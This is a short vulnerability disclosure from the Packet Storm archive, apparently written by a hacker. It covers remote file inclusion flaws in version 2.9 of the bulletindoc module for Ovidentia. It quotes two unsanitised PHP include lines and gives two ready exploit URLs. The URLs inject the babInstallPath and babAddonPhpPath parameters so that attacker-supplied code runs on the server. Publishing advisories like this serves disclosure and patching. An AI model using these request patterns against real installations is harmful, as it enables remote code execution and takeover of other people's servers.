Ovidentia bulletindoc 2.9 Remote File Inclusion

2015-12-15T00:00:00
ID PACKETSTORM:134840
Type packetstorm
Reporter bd0rk
Modified 2015-12-15T00:00:00

Description

                                        
                                            `# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities  
# Author: bd0rk  
# eMail: bd0rk[at]hackermail.com  
# Twitter: twitter.com/bd0rk  
# Tested on: Ubuntu-Linux  
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792  
  
PoC1:  
  
/bulletindoc-2-9/programs/admin.php line 2  
------------------------------------------------------  
  
include $babInstallPath."admin/acl.php";  
  
------------------------------------------------------  
  
[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]  
  
Description: The $babInstallPath-parameter isn't declared before include.  
So an attacker can execute evil-code 'bout this.  
  
  
  
PoC2:  
  
/bulletindoc-2-9/programs/main.php line 2  
-------------------------------------------------------  
  
require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");  
  
-------------------------------------------------------  
  
[+]Sploit2: http://[s0me0ne/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?  
  
Description: The problem is the same as the first. -.-  
It's possible to compromise the system.  
  
### The 27 years old, german hacker bd0rk ###  
  
Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm  
  
`